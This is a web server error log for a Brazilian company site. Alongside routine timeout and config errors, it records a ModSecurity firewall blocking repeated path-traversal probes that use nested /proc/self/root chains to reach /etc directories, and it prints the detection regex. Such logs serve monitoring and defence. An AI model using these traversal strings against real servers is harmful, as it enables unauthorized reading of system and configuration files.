[Thu Mar 19 07:02:09.762642 2026] [:error] [pid 27403:tid 140411741927168] [client 74.7.243.128:59070] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJoBkFeYa1D6dYQnDRvwAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 07:02:12.590878 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:35228] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJpPu8EFLIOrSqIpuDZwAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 07:02:17.908084 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:35230] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJqeoXxyEfFpUF8f_xpgAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 07:02:19.236797 2026] [mime_magic:error] [pid 17887:tid 140411641214720] (70014)End of file found: [client 57.141.18.121:55188] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:02:28.256209 2026] [proxy_fcgi:error] [pid 19093:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:52384] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:02:34.048730 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:35230] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJuuoXxyEfFpUF8f_xsgAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 07:02:38.001675 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:55504] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvJvda6ubjKNq_cu4Yq0AAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 07:02:51.105791 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:52908] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:03:10.506384 2026] [core:alert] [pid 27403:tid 140411607643904] [client 57.141.18.91:56602] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 07:03:15.151517 2026] [proxy_fcgi:error] [pid 27403:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:53592] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:03:34.799321 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.244.43:46848] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvJ9gkwaGbbGflqUZCcqgAAANM"]
[Thu Mar 19 07:03:41.129780 2026] [proxy_fcgi:error] [pid 19093:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:54188] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:04:08.133764 2026] [proxy_fcgi:error] [pid 14269:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:54898] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:04:33.153851 2026] [proxy_fcgi:error] [pid 17887:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:55574] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:04:58.129973 2026] [proxy_fcgi:error] [pid 27403:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:56262] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:05:31.153089 2026] [proxy_fcgi:error] [pid 14269:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:57096] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:05:59.133902 2026] [proxy_fcgi:error] [pid 14269:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:57918] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:06:19.640237 2026] [mime_magic:error] [pid 31803:tid 140411691570944] (70014)End of file found: [client 57.141.18.16:60828] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:06:22.133785 2026] [proxy_fcgi:error] [pid 30077:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:58614] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:06:25.241111 2026] [:error] [pid 19093:tid 140411666392832] [client 74.7.228.61:46234] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvKoV_V7PWP6ixUYl6e2AAAAok"]
[Thu Mar 19 07:06:40.934665 2026] [mime_magic:error] [pid 27403:tid 140411574073088] (70014)End of file found: [client 57.141.18.101:33812] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:06:48.813854 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:59308] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:07:13.129819 2026] [proxy_fcgi:error] [pid 27293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:60000] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:07:36.125912 2026] [proxy_fcgi:error] [pid 27403:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:60652] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:07:36.269219 2026] [core:alert] [pid 17887:tid 140411565680384] [client 57.141.18.16:35458] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 07:07:42.040462 2026] [core:alert] [pid 17653:tid 140411607643904] [client 57.141.18.23:35446] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 07:07:58.152417 2026] [proxy_fcgi:error] [pid 19093:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:32996] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:08:21.125776 2026] [proxy_fcgi:error] [pid 17653:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:33630] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:08:35.110453 2026] [:error] [pid 27293:tid 140411733534464] [client 74.7.244.43:50144] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvLI_-YZRR_7pZ7nDJwUAAAA8E"]
[Thu Mar 19 07:08:36.947691 2026] [core:alert] [pid 14269:tid 140411666392832] [client 57.141.18.62:37210] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 07:08:44.129794 2026] [proxy_fcgi:error] [pid 31803:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34214] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:09:03.564389 2026] [core:alert] [pid 19093:tid 140411741927168] [client 57.141.18.93:37940] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 07:09:08.337108 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.243.128:53756] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvLRAbLMZ6AikZjR9VAAgAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:09:09.125058 2026] [proxy_fcgi:error] [pid 17887:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:34910] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:09:32.133836 2026] [proxy_fcgi:error] [pid 27403:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:35536] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:09:57.025804 2026] [proxy_fcgi:error] [pid 27403:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:36126] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:09:59.648797 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.243.128:57118] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvLd8df6f5d65gmYZRXQQAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:10:16.141256 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:55140] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvLiAkwaGbbGflqUZCdwAAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:10:20.252347 2026] [core:alert] [pid 26799:tid 140411649607424] [client 57.141.18.68:39922] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 07:10:27.126408 2026] [proxy_fcgi:error] [pid 15826:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:36884] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:10:58.045874 2026] [proxy_fcgi:error] [pid 17653:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:37688] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:11:08.681223 2026] [mime_magic:error] [pid 30077:tid 140411574073088] (70014)End of file found: [client 57.141.18.44:41422] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:11:28.229798 2026] [proxy_fcgi:error] [pid 27403:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:38532] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:11:31.140468 2026] [:error] [pid 27293:tid 140411624429312] [client 74.7.228.61:59920] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvL0_-YZRR_7pZ7nDJwvwAAA84"]
[Thu Mar 19 07:11:45.335268 2026] [core:alert] [pid 17887:tid 140411699963648] [client 57.141.18.34:42022] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 07:11:49.116954 2026] [:error] [pid 27293:tid 140411658000128] [client 74.7.243.128:41444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvL5f-YZRR_7pZ7nDJwxwAAA8o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:11:55.057832 2026] [proxy_fcgi:error] [pid 30077:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39244] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:12:20.141786 2026] [proxy_fcgi:error] [pid 17887:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:39914] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:12:24.979576 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:51352] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvMCMdf6f5d65gmYZRXrQAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:12:32.389178 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.243.128:33466] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvMDwkwaGbbGflqUZCeHgAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:12:37.939611 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.243.128:33472] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvMFfu8EFLIOrSqIpuFJQAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 07:12:44.129778 2026] [proxy_fcgi:error] [pid 17887:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:40548] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:12:54.947304 2026] [mime_magic:error] [pid 30077:tid 140411674785536] (70014)End of file found: [client 74.7.243.128:55744] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/opt/puppetlabs/puppet
[Thu Mar 19 07:12:54.947450 2026] [access_compat:error] [pid 30077:tid 140411674785536] [client 74.7.243.128:55744] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/opt/puppetlabs/puppet
[Thu Mar 19 07:13:08.217773 2026] [proxy_fcgi:error] [pid 27403:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:41192] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:13:31.127324 2026] [proxy_fcgi:error] [pid 27403:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:41904] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:13:44.487727 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.244.43:33328] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvMWAbLMZ6AikZjR9VAmwAAABM"]
[Thu Mar 19 07:13:47.622193 2026] [mime_magic:error] [pid 27403:tid 140411540502272] (70014)End of file found: [client 57.141.18.63:45258] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:13:54.589818 2026] [proxy_fcgi:error] [pid 27403:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42532] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:14:16.125770 2026] [proxy_fcgi:error] [pid 17887:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:43216] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:14:39.125161 2026] [proxy_fcgi:error] [pid 26799:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:43940] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:15:02.229795 2026] [proxy_fcgi:error] [pid 27293:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:44538] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:15:29.125767 2026] [proxy_fcgi:error] [pid 17887:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:45234] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 07:15:46.650631 2026] [mime_magic:error] [pid 14269:tid 140411725141760] (70014)End of file found: [client 57.141.18.9:48868] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 07:15:56.137804 2026] [proxy_fcgi:error] [pid 26799:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:45882] AH01075: Error dispatching request to : (polling)
